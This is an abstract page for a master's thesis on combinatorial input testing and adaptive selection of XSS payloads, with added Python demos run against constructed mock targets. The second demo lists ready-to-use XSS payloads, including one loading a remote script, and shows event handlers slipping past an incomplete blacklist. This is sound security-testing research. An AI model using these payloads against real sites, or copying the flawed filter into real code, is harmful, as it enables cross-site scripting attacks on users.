
Input Function Testing And XSS Vulnerability Detection For WEB Applications

Posted on: 2020-10-30
Degree: Master
Type: Thesis
Country: China
Candidate: C C Lv
Full Text: PDF
GTID: 2428330575966296
Subject: Computer software and theory
Abstract/Summary:
WEB applications are among the most widely used software in the world, but high-profile web application failures and vulnerabilities indicate that developers have not tested such programs adequately. If the server program does not fully verify the legitimacy of user input, it may cause system failures or even a security risk such as an XSS vulnerability. Many black-box testing tools collect a large number of Payloads and traverse them until one is injected successfully in order to detect an XSS vulnerability. This is inefficient, yet previous research has paid little attention to how to find XSS vulnerabilities in WEB applications with fewer Payloads. These failures and vulnerabilities not only affect the user experience, but also bring great security problems. In this dissertation, we propose test methods for such problems. The main work is as follows:

(1) Generate test cases with the method of combinatorial testing to test the input function that interacts with the server in a WEB application, where each test case is a string of special characters. For test cases that cause server errors, we use fault location based on combinatorial testing to find the combinations of characters that cause the error. We developed WEBCT, a prototype tool for testing the input function of WEB applications. We tested 96 websites, including school, government and institutional websites, with WEBCT and found that 23 of them have problems with the input function: when a user submits certain special strings, the server returns an error response. Analysing the fault location results, we find that 56% of server errors are caused by combinations of "%", "<", '"', "'", "\" and other characters.

(2) Apply the adaptive random testing method to XSS vulnerability detection and propose a Payload selection method, XSSART. The method is based on the observation that effective Payloads tend to cluster together. Therefore, after a Payload fails to be injected, XSSART measures the distance between the failed Payload and the other Payloads, and selects as the next Payload the one most likely to be injected successfully, so as to find the vulnerability more quickly. We used a total of 22 XSS vulnerabilities in 3 open-source web applications and 1 real web application to evaluate XSSART. The experimental results indicate that XSSART improves on the Fuzzing method by more than 27.2% in reducing the number of attempts before a successful injection.
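The following is an added illustration of the part (1) workflow (combinatorial generation of special-character test strings, detection of server errors, and fault location that narrows a failing string down to its failure-inducing character combination). It is not WEBCT or any code from the thesis. The remote server is replaced by a constructed in-process handler (`mock_handler`) whose two defects, a strict percent-decoder and a naive quote escaper, are invented for the demo, and the alphabet `SPECIAL_CHARS` is an assumption that extends the few characters the abstract names.

```python
"""Combinatorial input-function testing with fault location.

Added illustration of the WEBCT-style workflow from part (1); it is not the
thesis's code.  The remote server is replaced by a constructed in-process
handler whose two defects are invented for the demo."""
from collections import Counter
from itertools import combinations, product
from typing import Callable, Dict, List

Handler = Callable[[str], str]

# Test-case alphabet (assumption: the abstract names only some of its
# characters; this list extends it with other common metacharacters).
SPECIAL_CHARS = ['%', '<', '>', '"', "'", '\\', ';', '&', '#']


class ServerError(Exception):
    """Stands in for an HTTP 500 response from the target."""


def strict_percent_decode(s: str) -> str:
    """Constructed decoder: a '%' must be followed by two hex digits, except
    that a '%' as the very last character is passed through unchanged."""
    out, i = [], 0
    while i < len(s):
        if s[i] == '%' and i + 1 < len(s):
            hexpart = s[i + 1:i + 3]
            if len(hexpart) < 2 or any(c not in '0123456789abcdefABCDEF' for c in hexpart):
                raise ServerError(f'bad percent escape at offset {i}')
            out.append(chr(int(hexpart, 16)))
            i += 3
        else:
            out.append(s[i])
            i += 1
    return ''.join(out)


def mock_handler(user_input: str) -> str:
    """Constructed input function: decode, then wrap the value in a
    single-quoted literal.  Its escaper breaks on a backslash-quote pair."""
    decoded = strict_percent_decode(user_input)
    if "\\'" in decoded:
        raise ServerError('unterminated quoted literal after escaping')
    return "'" + decoded.replace("'", "\\'") + "'"


def generate_tests(alphabet: List[str], length: int) -> List[str]:
    """Every ordered combination of `length` characters from the alphabet,
    so each interaction of the `length` positions is covered."""
    return [''.join(p) for p in product(alphabet, repeat=length)]


def fails(handler: Handler, case: str) -> bool:
    """True when the handler answers this input with a server error."""
    try:
        handler(case)
    except ServerError:
        return True
    return False


def locate_fault(handler: Handler, failing_case: str) -> str:
    """Smallest order-preserving subsequence of a failing input that still
    triggers the error: the failure-inducing character combination."""
    n = len(failing_case)
    for size in range(1, n + 1):
        for idx in combinations(range(n), size):
            candidate = ''.join(failing_case[i] for i in idx)
            if fails(handler, candidate):
                return candidate
    return failing_case


def fault_summary(handler: Handler, alphabet: List[str], length: int) -> Dict[str, int]:
    """Run the whole suite, localise each failure, count root causes."""
    causes: Counter = Counter()
    for case in generate_tests(alphabet, length):
        if fails(handler, case):
            causes[locate_fault(handler, case)] += 1
    return dict(causes)


if __name__ == '__main__':
    summary = fault_summary(mock_handler, SPECIAL_CHARS, 3)
    total = sum(summary.values())
    with_percent = sum(n for cause, n in summary.items() if '%' in cause)
    print(f'{total} failing cases, {len(summary)} distinct causes, '
          f'{100 * with_percent / total:.0f}% involve "%"')
    for cause, n in sorted(summary.items(), key=lambda kv: -kv[1])[:5]:
        print(f'{cause!r}: {n}')
```

Against a real target, `mock_handler` becomes an HTTP request and `ServerError` a 5xx status check; the generation and localisation logic is unchanged. The subsequence search in `locate_fault` is exponential in the string length, which is acceptable here because combinatorial test strings are short by design.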
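The following is an added illustration of the part (2) idea: after a Payload fails, the next one is chosen far from the failed cluster rather than in list order. It is not XSSART or any code from the thesis. The distance metric (Jaccard distance over character bigrams), the Payload pool, and the target (a reflected sink guarded by a deliberately incomplete, case-insensitive blacklist) are all constructed for the demo; the abstract does not state which distance XSSART uses.

```python
"""Adaptive-random-testing style Payload selection (XSSART idea).

Added illustration of part (2); it is not the thesis's code.  The distance
metric is an assumption (Jaccard distance over character bigrams) and the
target is a constructed reflected sink with an incomplete blacklist."""
import re
from typing import Callable, List, Optional, Set, Tuple

# Constructed Payload pool, in the order a naive fuzzer would try them.
PAYLOADS = [
    "<script>alert(1)</script>",
    "<ScRiPt>alert(1)</ScRiPt>",
    "<script src=//x/y.js></script>",
    "<img src=x onerror=alert(1)>",
    "<svg onload=alert(1)>",
    "<body onload=alert(1)>",
    "<a href=javascript:alert(1)>x</a>",
    "<iframe src=javascript:alert(1)>",
    "<input autofocus onfocus=alert(1)>",
    "<details open ontoggle=alert(1)>",
    "<marquee onstart=alert(1)>",
    "<img src=x OnErRoR=alert(1)>",
]

# Constructed blacklist: incomplete on purpose, other event handlers pass.
BLACKLIST = ('<script', 'onerror', 'javascript:')


def vulnerable_reflect(payload: str) -> str:
    """Constructed target: reflects user input after stripping every
    blacklisted substring case-insensitively."""
    cleaned = payload
    for bad in BLACKLIST:
        cleaned = re.sub(re.escape(bad), '', cleaned, flags=re.IGNORECASE)
    return f'<div>{cleaned}</div>'


def injected(payload: str) -> bool:
    """Oracle: the injection worked if the Payload is reflected verbatim."""
    return payload in vulnerable_reflect(payload)


def bigrams(s: str) -> Set[str]:
    return {s[i:i + 2] for i in range(len(s) - 1)} or {s}


def distance(a: str, b: str) -> float:
    """Jaccard distance between the bigram sets of two Payloads (assumption)."""
    x, y = bigrams(a), bigrams(b)
    union = x | y
    return 1.0 - len(x & y) / len(union) if union else 0.0


def select_next(failed: List[str], candidates: List[str]) -> str:
    """ART step: pick the untried Payload whose nearest failed Payload is
    farthest away (max-min distance), i.e. leave the failed cluster."""
    return max(candidates, key=lambda c: min(distance(c, f) for f in failed))


Oracle = Callable[[str], bool]


def run_sequential(pool: List[str], oracle: Oracle) -> Tuple[int, Optional[str]]:
    """Baseline fuzzer: try the pool in list order."""
    for attempts, payload in enumerate(pool, start=1):
        if oracle(payload):
            return attempts, payload
    return len(pool), None


def run_art(pool: List[str], oracle: Oracle, seed: int = 0) -> Tuple[int, Optional[str]]:
    """Adaptive selection: after each failure, jump away from all failures."""
    remaining = list(pool)
    current = remaining.pop(seed)
    failed: List[str] = []
    attempts = 0
    while True:
        attempts += 1
        if oracle(current):
            return attempts, current
        failed.append(current)
        if not remaining:
            return attempts, None
        current = select_next(failed, remaining)
        remaining.remove(current)


if __name__ == '__main__':
    print('sequential:', run_sequential(PAYLOADS, injected))
    print('ART       :', run_art(PAYLOADS, injected))
```

The sequential run burns its first four attempts on `<script` and `onerror` variants that the blacklist catches; the ART run leaves that cluster after the first failure and reaches an unfiltered event handler in far fewer attempts. The metric matters: a distance that ignores case would treat `<ScRiPt>` and `<script>` as identical, which is what you want when the filter is case-insensitive but not when it is case-sensitive.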
Keywords/Search Tags:Combinatorial testing, Fault location, XSS vulnerability detection, Adaptive random testing